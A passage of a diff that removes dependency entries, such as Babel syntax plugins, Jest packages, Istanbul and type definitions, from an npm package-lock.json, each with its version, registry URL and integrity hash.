"sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.20.0", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.20.0.tgz", - "integrity": "sha512-rd9TkG+u1CExzS4SM1BlMEhMXwFLKVjOAFFCDx9PbX5ycJWDoWMcwdJH9RhkPu1dOgn5TrxLot/Gx6lWFuAUNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.19.0" - } - }, - "@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - } - }, - "@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - } - }, - "@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.4.1.tgz", - "integrity": "sha512-m+XpwKSi3PPM9znm5NGS8bBReeAJJpSkL1OuFCqaMaJL2YX9YXLkkI+MBchMPwu+ZuM2rynL51sgfkQteQ1CKQ==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.4.1.tgz", - "integrity": "sha512-RXFTohpBqpaTebNdg5l3I5yadnKo9zLBajMT0I38D0tDhreVBYv3fA8kywthI00sWxPztWLD3yjiUkewwu/wKA==", - "dev": true, - "requires": { - "@jest/console": "^29.4.1", - "@jest/reporters": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.4.0", - "jest-config": "^29.4.1", - "jest-haste-map": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-resolve-dependencies": "^29.4.1", - "jest-runner": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "jest-watcher": "^29.4.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.4.1.tgz", - "integrity": "sha512-pJ14dHGSQke7Q3mkL/UZR9ZtTOxqskZaC91NzamEH4dlKRt42W+maRBXiw/LWkdJe+P0f/zDR37+SPMplMRlPg==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-mock": "^29.4.1" - } - }, - "@jest/expect": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.4.1.tgz", - "integrity": "sha512-ZxKJP5DTUNF2XkpJeZIzvnzF1KkfrhEF6Rz0HGG69fHl6Bgx5/GoU3XyaeFYEjuuKSOOsbqD/k72wFvFxc3iTw==", - "dev": true, - "requires": { - "expect": "^29.4.1", - "jest-snapshot": "^29.4.1" - } - }, - "@jest/expect-utils": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.4.1.tgz", - "integrity": "sha512-w6YJMn5DlzmxjO00i9wu2YSozUYRBhIoJ6nQwpMYcBMtiqMGJm1QBzOf6DDgRao8dbtpDoaqLg6iiQTvv0UHhQ==", - "dev": true, - "requires": { - "jest-get-type": "^29.2.0" - } - }, - "@jest/fake-timers": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.4.1.tgz", - "integrity": "sha512-/1joI6rfHFmmm39JxNfmNAO3Nwm6Y0VoL5fJDy7H1AtWrD1CgRtqJbN9Ld6rhAkGO76qqp4cwhhxJ9o9kYjQMw==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.4.1", - "jest-mock": "^29.4.1", - "jest-util": "^29.4.1" - } - }, - "@jest/globals": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.4.1.tgz", - "integrity": "sha512-znoK2EuFytbHH0ZSf2mQK2K1xtIgmaw4Da21R2C/NE/+NnItm5mPEFQmn8gmF3f0rfOlmZ3Y3bIf7bFj7DHxAA==", - "dev": true, - "requires": { - "@jest/environment": "^29.4.1", - "@jest/expect": "^29.4.1", - "@jest/types": "^29.4.1", - "jest-mock": "^29.4.1" - } - }, - "@jest/reporters": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.4.1.tgz", - "integrity": "sha512-AISY5xpt2Xpxj9R6y0RF1+O6GRy9JsGa8+vK23Lmzdy1AYcpQn5ItX79wJSsTmfzPKSAcsY1LNt/8Y5Xe5LOSg==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - } - }, - "@jest/schemas": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.4.0.tgz", - "integrity": "sha512-0E01f/gOZeNTG76i5eWWSupvSHaIINrTie7vCyjiYFKgzNdyEGd12BUv4oNBFHOqlHDbtoJi3HrQ38KCC90NsQ==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.25.16" - } - }, - "@jest/source-map": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.2.0.tgz", - "integrity": "sha512-1NX9/7zzI0nqa6+kgpSdKPK+WU1p+SJk3TloWZf5MzPbxri9UEeXX5bWZAPCzbQcyuAzubcdUHA7hcNznmRqWQ==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.15", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.4.1.tgz", - "integrity": "sha512-WRt29Lwt+hEgfN8QDrXqXGgCTidq1rLyFqmZ4lmJOpVArC8daXrZWkWjiaijQvgd3aOUj2fM8INclKHsQW9YyQ==", - "dev": true, - "requires": { - "@jest/console": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.4.1.tgz", - "integrity": "sha512-v5qLBNSsM0eHzWLXsQ5fiB65xi49A3ILPSFQKPXzGL4Vyux0DPZAIN7NAFJa9b4BiTDP9MBF/Zqc/QA1vuiJ0w==", - "dev": true, - "requires": { - "@jest/test-result": "^29.4.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - } - }, - "@jest/types": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.4.1.tgz", - "integrity": "sha512-zbrAXDUOnpJ+FMST2rV7QZOgec8rskg2zv8g2ajeqitp4tvZiyqTCYXANrKsM+ryj5o+LI+ZN2EgU9drrkiwSA==", - "dev": true, - "requires": { - "@jest/schemas": "^29.4.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.1.1.tgz", - "integrity": "sha512-sQXCasFk+U8lWYEe66WxRDOE9PjVz4vSM51fTu3Hw+ClTpUSQb718772vH3pyS5pShp6lvQM7SxgIDXXXmOX7w==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.0.0", - "@jridgewell/sourcemap-codec": "^1.4.10" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.17", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.17.tgz", - "integrity": "sha512-MCNzAp77qzKca9+W/+I0+sEpaUnZoeasnghNeVc41VZCEKaCH73Vq3BZZ/SzWIgrqE4H4ceI+p+b6C0mHf9T4g==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - } - }, - "@sinclair/typebox": { - "version": "0.25.21", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.25.21.tgz", - "integrity": "sha512-gFukHN4t8K4+wVC+ECqeqwzBDeFeTzBXroBTqE6vcWrQGbEUpHO7LYdG0f4xnvYq4VOEwITSlHlp0JBAIFMS/g==", - "dev": true - }, - "@sinonjs/commons": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-2.0.0.tgz", - "integrity": "sha512-uLa0j859mMrg2slwQYdO/AkrOfmH+X6LTVmNTS9CqexuE2IvVORIkSpJLqePAbEnKJ77aMmCwr1NUZ57120Xcg==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.0.2", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.0.2.tgz", - "integrity": "sha512-SwUDyjWnah1AaNl7kxsa7cfLhlTYoiyhDAIgyh+El30YvXs/o7OLXpYH88Zdhyx9JExKrmHDJ+10bwIcY80Jmw==", - "dev": true, - "requires": { - "@sinonjs/commons": "^2.0.0" - } - }, - "@types/babel__core": { - "version": "7.20.0", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.0.tgz", - "integrity": "sha512-+n8dL/9GWblDO0iU6eZAwEIJVr5DWigtle+Q6HLOrh/pdbXOhOtqzq8VPPE2zvNJzSKY4vH/z3iT3tn0A3ypiQ==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.18.3", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.18.3.tgz", - "integrity": "sha512-1kbcJ40lLB7MHsj39U4Sh1uTd2E7rLEa79kmDpI6cy+XiXsteB3POdQomoq4FxszMrO3ZYchkhYJw7A2862b3w==", - "dev": true, - "requires": { - "@babel/types": "^7.3.0" - } - }, - "@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.4.0.tgz", - "integrity": "sha512-VaywcGQ9tPorCX/Jkkni7RWGFfI11whqzs8dvxF41P17Z+z872thvEvlIbznjPJ02kl1HMX3LmLOonsj2n7HeQ==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/node": { - "version": "18.11.18", - "resolved": "https://registry.npmjs.org/@types/node/-/node-18.11.18.tgz", - "integrity": "sha512-DHQpWGjyQKSHj3ebjFI/wRKcqQcdR+MoFBygntYOZytCqNfkd2ZC4ARDJ2DQqhjH5p85Nnd3jhUJIXrszFX/JA==", - "dev": true - }, - "@types/prettier": { - "version": "2.7.2", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.2.tgz", - "integrity": "sha512-KufADq8uQqo1pYKVIYzfKbJfBAc0sOeXqGbFaSpv8MRmC/zXgowNZmFcbngndGk922QDmOASEXUZCaY48gs4cg==", - "dev": true - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "babel-jest": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.4.1.tgz", - "integrity": "sha512-xBZa/pLSsF/1sNpkgsiT3CmY7zV1kAsZ9OxxtrFqYucnOuRftXAfcJqcDVyOPeN4lttWTwhLdu0T9f8uvoPEUg==", - "dev": true, - "requires": { - "@jest/transform": "^29.4.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.4.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - } - }, - "babel-plugin-jest-hoist": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.4.0.tgz", - "integrity": "sha512-a/sZRLQJEmsmejQ2rPEUe35nO1+C9dc9O1gplH1SXmJxveQSRUYdBk8yGZG/VOUuZs1u2aHZJusEGoRMbhhwCg==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - } - }, - "babel-preset-jest": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.4.0.tgz", - "integrity": "sha512-fUB9vZflUSM3dO/6M2TCAepTzvA4VkOvl67PjErcrQMGt9Eve7uazaeyCZ2th3UtI7ljpiBJES0F7A1vBRsLZA==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.4.0", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz", - "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==", - "dev": true, - "requires": { - "fill-range": "^7.0.1" - } - }, - "browserslist": { - "version": "4.21.5", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.5.tgz", - "integrity": "sha512-tUkiguQGW7S3IhB7N+c2MV/HZPSCPAAiYBZXLsBhFB/PCy6ZKKsZrmBayHV9fdGV/ARIfJ14NkxKzRDjvp7L6w==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001449", - "electron-to-chromium": "^1.4.284", - "node-releases": "^2.0.8", - "update-browserslist-db": "^1.0.10" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": 